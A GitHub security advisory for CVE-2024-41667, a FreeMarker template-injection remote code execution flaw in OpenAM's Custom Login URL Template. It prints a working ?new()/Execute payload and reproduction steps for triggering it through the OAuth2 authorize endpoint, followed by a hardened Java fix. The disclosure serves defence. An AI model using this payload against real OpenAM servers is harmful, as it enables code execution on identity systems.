
OpenAM FreeMarker template injection

High
vharseko published GHSA-7726-43hg-m23v Jul 24, 2024

Package

maven org.openidentityplatform.openam:openam-oauth2 (Maven)

Affected versions

<=15.0.3

Patched versions

15.0.4

Description

Authenticated RCE in OpenAM <= 15.0.3 (the latest release at the time of the report)

Vulnerable versions:

OpenAM <= 15.0.3 (latest release at the time of the report)

Vulnerability Description:

FreeMarker template injection.
The reason I mentioned GHSA-4mh8-9wq6-rjxg in the description is that exploiting both vulnerabilities simultaneously achieves remote code execution without authorization.
This vulnerability can be exploited without CVE-2023-37471; it is a brand new vulnerability.

Vulnerability Cause:

The getCustomLoginUrlTemplate method in RealmOAuth2ProviderSettings.java is vulnerable to template injection: the string it returns is taken from a configurable setting and later compiled and evaluated as a full FreeMarker template without any restriction on its contents.

[screenshot: getCustomLoginUrlTemplate in RealmOAuth2ProviderSettings.java]

Although the developer intended the Custom Login URL Template to let an administrator override the default login page with a custom URL, the value of CustomLoginUrlTemplate is not restricted in any way: whatever is configured is compiled and evaluated as a FreeMarker template.

A normal CustomLoginUrlTemplate looks like this (shown as the template text; the original listing is the equivalent Java string concatenation):

```
http://mylogin.com/login?goto=${goto}<#if acrValues??>&acr_values=${acrValues}</#if><#if realm??>&realm=${realm}</#if><#if module??>&module=${module}</#if><#if service??>&service=${service}</#if><#if locale??>&locale=${locale}</#if>
```

A malicious CustomLoginUrlTemplate uses the ?new built-in to instantiate freemarker.template.utility.Execute, which runs an arbitrary OS command (here calc on a Windows host) when the template is processed:

```
<#assign value="freemarker.template.utility.Execute"?new()>${value("calc")}
```

Vulnerability Reproduction:

1. Create a malicious OAuth2 provider configuration

Create a new OAuth2 provider in the realm.

[screenshot: creating the OAuth2 provider]

Configure the OAuth2 provider.

[screenshot: OAuth2 provider configuration]

Fill the Custom Login URL Template field with the triggering payload:

```
<#assign value="freemarker.template.utility.Execute"?new()>${value("calc")}
```

[screenshot: Custom Login URL Template field containing the payload]

2. Request the OAuth2 authorize endpoint to trigger the payload

http://127.0.0.1:8080/OpenAM-15.0.3/oauth2/realms/root/authorize?client_id=1&scope=employeenumber&redirect_uri=https://github.com&response_type=code&csrf=AQIC5wM2LY4SfczyIULj2pD_csR6GSncuuxH2CEA7IIC0Ak.*AAJTSQACMDEAAlNLABM2MDY3NjE5NTU4NTgzMDk2MjM5AAJTMQAA*&max_age=200

Note:

The csrf parameter is there to pass the CSRF check on the authorize endpoint: its value must equal the iPlanetDirectoryPro session cookie of the requesting session, otherwise the request fails the CSRF check.

The max_age parameter forces the evaluation in isPastMaxAge(getMaxAge(request), authTime), which checks

```
maxAge > -1 && maxAge <= currentTimeMillis() - authTime
```

The condition holds only when max_age is non-negative and the session was authenticated at least max_age ago, so the value has to be smaller than the current age of the session. If the first attempt does not trigger the payload, retry with other non-negative values such as max_age=100, max_age=200, and so on.

The overall attack path is as follows:

```
AuthorizationService.authorize ->
resourceOwnerSessionValidator.validate ->
ResourceOwnerSessionValidator.authenticationRequired(request, token) ->
ResourceOwnerSessionValidator.authenticationRequired(OAuth2Request request) ->
ResourceOwnerSessionValidator.buildDefaultLoginUrl ->
loginUrlTemplate.process(templateData, loginUrlWriter)
```

The loginUrlTemplate template is created from the configured string with a default Configuration, i.e. with FreeMarker's unrestricted class resolver:

```java
new Template("customLoginUrlTemplate", new StringReader(loginUrlTemplateString),
        new Configuration())
```

3. Proof of exploitation

[screenshot: result of the payload execution]

Repair Recommendation:

Set TemplateClassResolver.SAFER_RESOLVER on the FreeMarker Configuration (Configuration.setNewBuiltinClassResolver) so that the ?new built-in can no longer instantiate the classes commonly abused in FreeMarker template injection (freemarker.template.utility.Execute, ObjectConstructor and JythonRuntime). Since a login URL template only needs variable interpolation and <#if> guards, TemplateClassResolver.ALLOWS_NOTHING_RESOLVER, which disables ?new entirely, is the stricter choice; either way the Custom Login URL Template field must be treated as privileged configuration.
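The unsafe construction and the recommended fix side by side, as an added example that is not OpenAM's code: the class name, the render methods, the main method and the sample data model are my own, and it assumes FreeMarker 2.3.31 or newer on the classpath. The benign template from the cause section renders identically under both configurations; the malicious one is rejected at the ?new() call by the hardened configuration.

```java
// Added example, not OpenAM code. Assumes FreeMarker 2.3.31+ on the classpath.
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateClassResolver;
import freemarker.template.TemplateException;

import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.HashMap;
import java.util.Map;

public class LoginUrlTemplateDemo {

    // Benign value: placeholders and <#if x??> guards only.
    static final String BENIGN =
        "http://mylogin.com/login?goto=${goto}"
        + "<#if acrValues??>&acr_values=${acrValues}</#if><#if realm??>&realm=${realm}</#if>"
        + "<#if module??>&module=${module}</#if><#if service??>&service=${service}</#if>"
        + "<#if locale??>&locale=${locale}</#if>";

    // Payload from the advisory ("calc" is calc.exe on Windows). The hardened
    // path below rejects it before any command runs.
    static final String MALICIOUS =
        "<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"calc\")}";

    /** Mirrors the vulnerable pattern: a fresh Configuration with the default
     *  (unrestricted) class resolver, so ?new() can instantiate Execute. */
    static String renderUnsafe(String templateString, Map<String, Object> data)
            throws IOException, TemplateException {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_31);
        Template t = new Template("customLoginUrlTemplate",
                                  new StringReader(templateString), cfg);
        StringWriter out = new StringWriter();
        t.process(data, out);   // with MALICIOUS this executes the OS command
        return out.toString();
    }

    /** Hardened: SAFER_RESOLVER refuses Execute, ObjectConstructor and
     *  JythonRuntime; ALLOWS_NOTHING_RESOLVER would refuse ?new altogether. */
    static String renderHardened(String templateString, Map<String, Object> data)
            throws IOException, TemplateException {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_31);
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER);
        // Stricter alternative for a login URL, which never needs ?new:
        // cfg.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
        Template t = new Template("customLoginUrlTemplate",
                                  new StringReader(templateString), cfg);
        StringWriter out = new StringWriter();
        t.process(data, out);   // throws TemplateException for MALICIOUS
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample data model standing in for OpenAM's templateData.
        Map<String, Object> data = new HashMap<>();
        data.put("goto", "https://example.test/app");
        data.put("realm", "/");

        // The legitimate template still works under the hardened resolver.
        System.out.println(renderHardened(BENIGN, data));

        // The payload is blocked when ?new() tries to resolve Execute.
        try {
            renderHardened(MALICIOUS, data);
            System.out.println("not blocked (unexpected)");
        } catch (TemplateException e) {
            System.out.println("blocked: " + e.getMessage());
        }

        // Uncomment to watch the unsafe path actually run the command:
        // System.out.println(renderUnsafe(MALICIOUS, data));
    }
}
```

SAFER_RESOLVER only closes the ?new route through the three well-known utility classes; the template language itself still runs with whatever objects are in the data model, so the field should stay administrator-only regardless of which resolver is chosen.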

Severity

High

CVE ID

CVE-2024-41667

Weaknesses

Improper Control of Generation of Code ('Code Injection')

The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Credits